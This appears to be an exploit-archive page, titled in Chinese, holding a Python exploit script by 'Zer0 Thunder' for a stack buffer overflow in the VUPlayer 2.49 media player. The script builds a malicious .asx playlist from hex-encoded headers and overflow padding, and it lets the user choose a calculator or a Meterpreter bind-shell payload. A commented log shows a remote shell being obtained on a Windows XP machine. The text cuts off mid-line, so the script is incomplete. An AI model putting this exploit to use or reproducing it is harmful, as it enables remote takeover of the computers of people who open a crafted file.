VUPlayer_2.49堆棧緩衝區溢出漏洞

# VUPlayer 2.49堆棧緩衝區溢出漏洞
==EXP==

#[*] Started bind handler
#[*] Starting the payload handler...
#[*] Sending stage (749056 bytes) to 192.168.164.147
#[*] Meterpreter session 2 opened (192.168.164.141:53820 -> 192.168.164.147:4444) at 2011-07-02 04:08:05 +0530
#
#meterpreter > shell
#Process 2664 created.
#Channel 1 created.
#Microsoft Windows XP [Version 5.1.2600]
#(C) Copyright 1985-2001 Microsoft Corp.
#
#C:\Documents and Settings\Administrator\Desktop>
#

from struct import pack
import os
import sys
en = '''\

|| VUPlayer v2.49 Stack BufferOverflow Exploit (calc/bind) ||
                Author : Zer0 Thunder

------------------------------------------------------------
							 
Select the shellcode you want\n
1. Calculator 
2. Meterpreter BIND Shell 

Enter the Selected Shellcode Number
'''
print en
shell = input(":")
dimbo		= "crash.asx"
header1		= "\x3c\x61\x73\x78\x20\x76\x65\x72\x73\x69\x6f\x6e\x20\x3d\x20\x22\x33\x2e\x30\x22\x20\x3e\n"
header2n6	= "\x3c\x65\x6e\x74\x72\x79\x3e\n"
header3		= "\x3c\x74\x69\x74\x6c\x65\x3e\x65\x78\x70\x6c\x6f\x69\x74\x2e\x6d\x70\x33\x3c\x2f\x74\x69\x74\x6c\x65\x3e\n"
header4		= "\x3c\x72\x65\x66\x20\x68\x72\x65\x66\x20\x3d"
header5		= "\x22\x20\x2f\x3e\x3c\x65\x6e\x74\x72\x79\x3e"
header7		= "\n\x3c\x2f\x61\x73\x78\x3e"
junk		= "\x41" * 1012
junk2		= pack('